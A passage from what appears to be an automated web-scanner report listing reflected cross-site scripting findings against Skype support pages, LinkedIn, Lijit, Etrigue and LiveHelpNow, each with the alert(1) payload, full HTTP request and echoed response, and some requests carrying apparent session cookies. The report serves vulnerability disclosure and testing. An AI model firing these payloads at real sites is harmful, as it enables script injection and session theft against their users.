Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=29645411B817F05049B7EF8C6DEFE954; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:54 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3D
...[SNIP]...
g%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=19240f03b4"-alert(1)-"37599c03060&campId=161441",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   asid : "gsp73dmn"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"inf
...[SNIP]...

3.109. https://support.skype.com/en-us/glossary [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/glossary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bffb0"><script>alert(1)</script>b13866784b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/glossary?bffb0"><script>alert(1)</script>b13866784b5=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:52 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 68011


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="e
...[SNIP]...
<input type="hidden" name="context" value="/glossary.do?bffb0"><script>alert(1)</script>b13866784b5=1"/>
...[SNIP]...

3.110. https://support.skype.com/en-us/search.form [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/search.form

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1fe"><script>alert(1)</script>0e4d33b11c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/search.form?5e1fe"><script>alert(1)</script>0e4d33b11c6=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:36:57 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en
...[SNIP]...
<input type="hidden" name="context" value="/search.form.do?5e1fe"><script>alert(1)</script>0e4d33b11c6=1"/>
...[SNIP]...

3.111. https://support.skype.com/en-us/search_first/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/search_first/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eda5"><script>alert(1)</script>523a4c9c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/search_first/?2eda5"><script>alert(1)</script>523a4c9c01=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:50 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us"
...[SNIP]...
<input type="hidden" name="context" value="/searchFirst.do?2eda5"><script>alert(1)</script>523a4c9c01=1"/>
...[SNIP]...

3.112. https://support.skype.com/en/faqFeedback.form [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faqFeedback.form

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd92"><script>alert(1)</script>b2c781f336 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/faqFeedback.form?1dd92"><script>alert(1)</script>b2c781f336=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:33:03 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42398


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="context" value="/faqFeedback.form.do?1dd92"><script>alert(1)</script>b2c781f336=1"/>
...[SNIP]...

3.113. https://support.skype.com/en/glossary [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/glossary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc416"><script>alert(1)</script>d582ea7c7f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/glossary?bc416"><script>alert(1)</script>d582ea7c7f7=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:32 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 67106


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<input type="hidden" name="context" value="/glossary.do?bc416"><script>alert(1)</script>d582ea7c7f7=1"/>
...[SNIP]...

3.114. https://support.skype.com/en/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5e9a"><script>alert(1)</script>ccb5065965f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/search?q=xss&e5e9a"><script>alert(1)</script>ccb5065965f=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: support.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Content-Length: 42591
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...
<input type="hidden" name="context" value="/search.do?q=xss&e5e9a"><script>alert(1)</script>ccb5065965f=1"/>
...[SNIP]...

3.115. https://support.skype.com/en/search [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/search

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eacf1"><script>alert(1)</script>f803bab4b3d was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/search?q=xsseacf1"><script>alert(1)</script>f803bab4b3d HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: support.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:14 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Content-Length: 51205
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...
<input type="hidden" name="context" value="/search.do?q=xsseacf1"><script>alert(1)</script>f803bab4b3d"/>
...[SNIP]...

3.116. https://support.skype.com/en/search.form [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/search.form

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fb68"><script>alert(1)</script>87e00cca4aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/search.form?7fb68"><script>alert(1)</script>87e00cca4aa=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:33:06 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42394


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="context" value="/search.form.do?7fb68"><script>alert(1)</script>87e00cca4aa=1"/>
...[SNIP]...

3.117. https://support.skype.com/en/support_selection_after_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/support_selection_after_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d66"><script>alert(1)</script>825d2dc978e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/support_selection_after_search?33d66"><script>alert(1)</script>825d2dc978e=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:33:04 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 42410


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="context" value="/supportSelectionAfterSearch.do?33d66"><script>alert(1)</script>825d2dc978e=1"/>
...[SNIP]...

3.118. https://support.skype.com/en/tips [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/tips

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8243"><script>alert(1)</script>1574cf5533 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/tips?b8243"><script>alert(1)</script>1574cf5533=1 HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:16 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 44071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<input type="hidden" name="context" value="/tipsTricks.do?b8243"><script>alert(1)</script>1574cf5533=1"/>
...[SNIP]...

3.119. http://trk.etrigue.com/track.php [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.etrigue.com
Path:   /track.php

Issue detail

The value of the a request parameter is copied into the HTML document as plain text between tags. The payload b9dd3<script>alert(1)</script>d4467b383d0 was submitted in the a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /track.php?ie=1&a1017=&b1017=WzYzMzMxLC0xLC0xLC0xLC0xLDEwNzY2NiwzMDM3MTdd&a1017exit=1315153270&a=1017b9dd3<script>alert(1)</script>d4467b383d0&c=5&t=1315153325093 HTTP/1.1
Host: trk.etrigue.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: b1017=WzYzMzMxLC0xLC0xLC0xLC0xLDEwNzY2NiwzMDM3MTdd; a1017exit=1315153270

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
Set-Cookie: b1017b9dd3<script>alert(1)</script>d4467b383d0=deleted; expires=Sat, 04-Sep-2010 21:18:18 GMT; path=/
Set-Cookie: a1017b9dd3<script>alert(1)</script>d4467b383d0=deleted; expires=Sat, 04-Sep-2010 21:18:18 GMT; path=/
Set-Cookie: a1017b9dd3<script>alert(1)</script>d4467b383d0exit=1315171099; expires=Wed, 01-Feb-2012 21:18:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 21:18:19 GMT
Content-Length: 370

etrigueDCB1017b9dd3<script>alert(1)</script>d4467b383d0({"name":"b1017b9dd3<script>alert(1)<\/script>d4467b383d0"});etrigueDCB1017b9dd3<script>alert(1)</script>d4467b383d0({"name":"a1017b9dd3<script>a
...[SNIP]...

3.120. http://www.lijit.com/delivery/fp [n parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/fp

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e697"%3balert(1)//74392895200 was submitted in the n parameter. This input was echoed as 6e697";alert(1)//74392895200 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/fp?u=w3schools&z=128348&n=16e697"%3balert(1)//74392895200 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.4725153
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:24 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n10 ( lax-agg-n38), ms lax-agg-n38 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Mon, 05 Sep 2011 04:31:24 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 14967

function LjtAds_ReportError(errorMsg, except){
   try{
       errorMsg = "[Ads JS] "+ errorMsg
       try{
           errorMsg += " - "+ except.message
       } catch(e){}
       errorMsg = encodeURIComponent(errorMsg);
       
       var s
...[SNIP]...
Time String', e);
       return "00:00:00";
   }
}

try{
   // Settings: Change these values on a per user basis
   var lwp_ad_username = "w3schools";
   var lwp_ad_zoneid = ljt_getZoneID();
   var lwp_ad_numads = "16e697";alert(1)//74392895200";
   var lwp_ad_premium = "1";// or 0 for non-premium ad
   var lwp_ad_eleid = "lijit_region_128348";
   var lwp_method = "regex";
   var lwp_referring_search = getReferringSearch(document.referrer);
   
   var l
...[SNIP]...

3.121. http://www.linkedin.com/countserv/count/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 3ba89<img%20src%3da%20onerror%3dalert(1)>a71b4125463 was submitted in the url parameter. This input was echoed as 3ba89<img src=a onerror=alert(1)>a71b4125463 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424053111904900904576549933849920392.html%3Fmod%3Dwsj_share_in_bot3ba89<img%20src%3da%20onerror%3dalert(1)>a71b4125463 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 16:17:33 GMT
Content-Length: 195

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/online.wsj.com\/article\/SB10001424053111904900904576549933849920392.html?mod=wsj_share_in_bot3ba89<img src=a onerror=alert(1)>a71b4125463"});

3.122. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ba0fc%3balert(1)//dee046ad40a was submitted in the lhnid parameter. This input was echoed as ba0fc;alert(1)//dee046ad40a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288ba0fc%3balert(1)//dee046ad40a&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 16:18:23 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 10002


var lhnTrack='f';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnl
...[SNIP]...
ion.protocol=='https:' || (typeof lhnJsHost !='undefined' && lhnJsHost == "https://"))
   {
       window.open('https://www.livehelpnow.net/lhn/livechatvisitor.aspx?zzwindow=' + lhnwindow + '&lhnid=' + 1288ba0fc;alert(1)//dee046ad40a + '&d=' + 0,'lhnchat','left=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=' + sScrollbars + ',copyhistory=no,resizable=yes'
...[SNIP]...

3.123. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c53a"%3balert(1)//9f46c8341f8 was submitted in the lhnid parameter. This input was echoed as 2c53a";alert(1)//9f46c8341f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=12882c53a"%3balert(1)//9f46c8341f8&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 16:18:23 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 10012


var lhnTrack='f';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnl
...[SNIP]...
<img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=50.23.123.106|12882c53a";alert(1)//9f46c8341f8|9/4/2011 12:18:23 PM' />
...[SNIP]...

3.124. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66e04'%3balert(1)//c592964d139 was submitted in the t parameter. This input was echoed as 66e04';alert(1)//c592964d139 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f66e04'%3balert(1)//c592964d139 HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 16:18:24 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9760


var lhnTrack='f66e04';alert(1)//c592964d139';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepe
...[SNIP]...

3.125. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

